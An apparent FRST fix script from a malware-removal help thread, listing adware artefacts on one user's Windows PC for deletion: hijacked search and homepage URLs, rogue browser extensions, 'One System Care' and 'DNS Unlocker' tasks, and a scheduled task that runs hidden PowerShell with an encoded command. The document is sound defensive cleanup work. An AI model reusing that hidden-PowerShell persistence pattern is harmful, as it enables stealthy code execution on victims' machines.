CreateRestorePoint:
(PC Health Labs) C:\Program Files (x86)\PC Driver Kit\PCDKTray.exe
() C:\Users\thevi\AppData\Roaming\InetStat\inetstat.exe
() C:\Program Files (x86)\DNS Unlocker\dnsabernant.exe
HKU\S-1-5-21-1529242145-1452616481-1504460086-1001\...\Run: [InetStat] => C:\Users\thevi\AppData\Roaming\InetStat\inetstat.exe [840206 2016-01-02] ()
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> OldSearch URL =
SearchScopes: HKU\S-1-5-21-1529242145-1452616481-1504460086-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
BHO-x32: Royal Raid -> {730bc77f-4b48-4f48-9236-5cf092043d53} -> C:\Program Files (x86)\Royal Raid\Extensions\730bc77f-4b48-4f48-9236-5cf092043d53.dll [2016-01-02] ()
FF NewTab: hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAIVeFoIUgsVDAdAIl8VVQ9CEBhBJFteTA5IQgISdFgAAw5EQBNBNARaB0tXUUEeGGlxR1dMclBCMlpQMEwYQl5oLlZP
FF Homepage: hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggUdgFbUQpDRRgRI1teTA1HEgQOIl1aBxRGGFYUcQ1ZWVtGFFQFIk0FA18DB0VXfWFoKB8fHGZGIUtbCWgESFZIC1dXFg==
FF Keyword.URL: hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ4OWVpBEgdHbQtbA19cFQMQcRRaBVsXDAIaIw4JVVhJQwIWIR9aFQQTR0cFME0FB18EURNNfWpdAEsSSWRWKVpTKlceVg==&q={searchTerms}
FF user.js: detected! => C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\user.js [2016-01-03]
FF SearchPlugin: C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\searchplugins\default.xml [2016-01-17]
FF Extension: Search Quick Know - C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\Extensions\{320e2f33-a060-4f0b-94d7-3ad6d7bbf926}.xpi [2016-01-01] [not signed]
FF Extension: Royal Raid - C:\Users\thevi\AppData\Roaming\Mozilla\Firefox\Profiles\ierq1z1l.default\Extensions\{83fb3df9-c776-4679-8635-aa4ff1ace041}.xpi [2016-01-02] [not signed]
U3 mfeaack01; no ImagePath
U3 mfeavfk01; no ImagePath
U3 mfehidk01; no ImagePath
Task: {43D9139B-3DB3-4D0D-AF90-94673DF4460C} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {71C8D460-3C46-4812-89A8-C7A79CD71B4E} - System32\Tasks\PC Driver Kit Schedule => C:\Program Files (x86)\PC Driver Kit\PCDKTray.exe [2014-07-17] (PC Health Labs)
Task: {788118D0-0FE5-4FAA-88FF-986BB822DC0B} - System32\Tasks\{08087847-797F-7A0D-0B11-0F0F0D09110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
Task: {C1101B08-374D-4205-9667-022710374A6E} - System32\Tasks\DNSABERNANT => C:\Program Files (x86)\DNS Unlocker\dnsabernant.exe [2016-01-24] ()
Task: {DA36E2B2-DBB4-420E-9082-1D669F2A3ABC} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION
Task: 
{DB907E2E-B79E-4C4E-B318-E3A1A97962C9} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION
Task: C:\WINDOWS\Tasks\One System CarePeriod.job => <==== ATTENTION
C:\WINDOWS\System32\Tasks\DNSABERNANT
C:\Program Files (x86)\PC Driver Kit
C:\Users\thevi\AppData\Roaming\InetStat
C:\Program Files (x86)\DNS Unlocker
C:\Program Files (x86)\Royal Raid
C:\Users\thevi\OneDrive\Documents\PC Driver Kit
C:\WINDOWS\System32\Tasks\PC Driver Kit Schedule
C:\Users\thevi\AppData\Roaming\PC Driver Kit
C:\WINDOWS\System32\Tasks\One System CarePeriod
C:\WINDOWS\Tasks\One System CarePeriod.job
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Driver Kit
C:\Users\thevi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\InetStat
C:\ProgramData\95395ee5-1fb2-4248-a868-00d01e16d050
C:\Users\thevi\Desktop\PC Driver Kit.lnk
C:\Program Files (x86)\OneSystemCare
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
Hosts:
EmptyTemp:
C:\WINDOWS\System32\Tasks\{08087847-797F-7A0D-0B11-0F0F0D09110D}
C:\WINDOWS\System32\Tasks\One System Care Task
C:\WINDOWS\System32\Tasks\One System Care Monitor
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
C:\Users\thevi\AppData\Roaming\One System Care
C:\Users\Public\Desktop\Launch One System Care.lnk
C:\ProgramData\817ebb4e-68c3-1
C:\ProgramData\817ebb4e-35b5-0
C:\ProgramData\475a9272-9606-46f5-b309-fdfc084777bf
C:\Program Files (x86)\Search Quick Know
C:\Users\Public\VOIP.dat